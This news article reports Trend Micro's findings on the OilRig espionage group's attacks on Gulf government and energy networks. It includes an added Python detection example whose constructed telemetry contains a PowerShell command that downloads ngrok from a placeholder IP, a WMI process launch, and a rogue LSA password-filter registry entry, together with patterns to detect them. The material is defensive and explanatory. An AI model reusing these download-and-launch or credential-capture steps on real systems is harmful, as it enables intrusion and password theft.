OilRig Intensifies Cyberattacks on Critical Infra. in the Gulf
Trend Micro researchers have uncovered ongoing cyber espionage activity attributed to the threat group OilRig (aka APT34, COBALT GYPSY, Earth Simnavaz, EUROPIUM, Evasive Serpens, Hazel Sandstorm, Helix Kitten, and IRN2). The group, linked to Iranian state interests, is of heightened concern because it is actively targeting critical sectors, including government and energy, particularly in the United Arab Emirates (UAE) and the broader Gulf region. Its main objective is to exfiltrate sensitive information from sectors vital to national security and economic stability. "There has been a notable rise in cyberattacks attributed to this APT group, specifically targeting government sectors in the UAE and the broader Gulf region," reports Trend Micro, emphasizing the group's focus on exploiting vulnerabilities in critical infrastructure. Of added concern is the group's use of compromised organizations as a launchpad for supply chain attacks on other governmental entities, which further broadens its reach.
OilRig employs customized .NET tools and IIS-based malware designed to blend malicious activity with regular network traffic, making detection difficult. The attack chain observed by Trend Micro threat researchers and incident response analysts typically begins with a web shell uploaded to a vulnerable web server. The shell allows the execution of PowerShell commands, which drop further malicious payloads onto the compromised system. One sample PowerShell script used the 'Invoke-WebRequest' cmdlet to download the ngrok tool and then called WMI to launch it. Ngrok is used to establish a tunnel, enabling lateral movement across the compromised environment. To escalate privileges, the attackers exploit CVE-2024-30088, a Windows Kernel Elevation of Privilege vulnerability. OilRig also drops a password filter DLL on compromised systems, which lets the threat actors capture and exfiltrate plaintext credentials that are then used to pivot through the victim's network.
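As an added illustration that is not part of this article or Trend Micro's report, the following Python detection logic scans constructed telemetry (PowerShell script-block records and one registry-modification record, both labelled as constructed) for three observable steps of the chain described above: an Invoke-WebRequest download of ngrok, a process launch through WMI's Win32_Process class, and a new entry in the LSA "Notification Packages" registry value, which is where a password filter DLL must be registered. The event-record layout, the sample IP address, and the "unknownfilter" package name are assumptions made for the example.

```python
import re

# Constructed sample telemetry (not taken from the Trend Micro report).
# The registry record's Details field is written as a comma-separated
# package list, a simplified stand-in for real Sysmon/EDR output.
SAMPLE_EVENTS = [
    {"source": "PowerShell/4104",
     "message": "Invoke-WebRequest -Uri http://203.0.113.10/ngrok.zip -OutFile C:\\ProgramData\\n.zip"},
    {"source": "PowerShell/4104",
     "message": "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'C:\\ProgramData\\ngrok.exe'"},
    {"source": "Sysmon/13",
     "message": "TargetObject: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages "
                "Details: scecli, rassfm, unknownfilter"},
    {"source": "PowerShell/4104", "message": "Get-ChildItem C:\\Windows\\Temp"},
]

# Script-block patterns for the two PowerShell steps the article describes.
SCRIPT_RULES = [
    ("ngrok download via Invoke-WebRequest", re.compile(r"Invoke-WebRequest\b.*\bngrok", re.I)),
    ("process launch via WMI Win32_Process.Create", re.compile(r"Win32_Process\b.*\bCreate\b", re.I)),
]

# DLLs normally listed in LSA "Notification Packages" (scecli on all hosts,
# rassfm on domain controllers); anything else is a candidate password filter.
EXPECTED_LSA_PACKAGES = {"scecli", "rassfm"}
LSA_KEY_SUFFIX = "\\Control\\Lsa\\Notification Packages"


def unexpected_lsa_packages(details: str) -> list:
    """Return package names that are not in the expected baseline."""
    pkgs = [p.strip().lower() for p in details.split(",") if p.strip()]
    return [p for p in pkgs if p not in EXPECTED_LSA_PACKAGES]


def scan(events) -> list:
    """Return (finding, raw message) pairs for events matching the chain."""
    findings = []
    for ev in events:
        msg = ev["message"]
        if ev["source"].startswith("PowerShell"):
            for name, rx in SCRIPT_RULES:
                if rx.search(msg):
                    findings.append((name, msg))
        elif ev["source"] == "Sysmon/13" and LSA_KEY_SUFFIX in msg:
            m = re.search(r"Details:\s*(.*)$", msg)
            extra = unexpected_lsa_packages(m.group(1)) if m else []
            if extra:  # a newly registered, non-baseline notification package
                findings.append(("unexpected LSA notification package: " + ", ".join(extra), msg))
    return findings
```

Running `scan(SAMPLE_EVENTS)` flags the first three records and leaves the benign directory listing alone; in production the baseline set should be taken from a known-good host rather than hard-coded.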
In one of the more complex techniques observed, OilRig uses compromised Exchange servers to exfiltrate data. According to Trend Micro, "The threat actors leverage legitimate accounts with stolen passwords to route these emails through government Exchange Servers." This allows sensitive information to be exfiltrated without raising immediate suspicion. Trend Micro researchers noted similarities between the backdoor used in this campaign and one seen in previous operations attributed to the same group, showing that OilRig refines and reuses its methods across different targets. The attack was attributed to OilRig based on the tools used in the campaign, such as ngrok, and on the backdoors themselves. Trend Micro notes that a "significant similarity has been observed at both the code and functionality levels between the Exchange backdoor used in this attack and the one seen in the earlier campaign."
Organizations in geopolitically sensitive regions, especially in the Gulf, should remain vigilant and prioritize mitigating vulnerabilities such as CVE-2024-30088. Evidence of this CVE's exploitation prompted its addition to CISA's Known Exploited Vulnerabilities (KEV) catalog on October 15, 2024. CISA urges organizations to patch the affected systems and address any other vulnerabilities listed in the KEV catalog promptly.